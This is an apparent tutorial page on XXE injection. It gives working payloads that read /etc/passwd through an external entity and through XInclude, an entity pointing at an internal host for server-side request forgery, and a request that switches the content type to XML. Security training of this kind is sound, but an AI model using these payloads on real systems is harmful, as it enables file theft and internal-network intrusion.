XML Injection

XXE to retrieve files

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:

Invalid product ID: root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

XXE to perform SSRF attacks

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

XInclude attacks

<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE attacks via modified content type

For example, if a normal request contains the following:

POST /action HTTP/1.0 
Content-Type: application/x-www-form-urlencoded
Content-Length: 7 

foo=bar

Then you might be able submit the following request, with the same result:

POST /action HTTP/1.0 
Content-Type: text/xml 
Content-Length: 52 

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

Last updated 2 years ago

hashtagXXE to retrieve files

hashtagXXE to perform SSRF attacks

hashtagXInclude attacks

hashtagXXE attacks via modified content type

XXE to retrieve files

XXE to perform SSRF attacks

XInclude attacks

XXE attacks via modified content type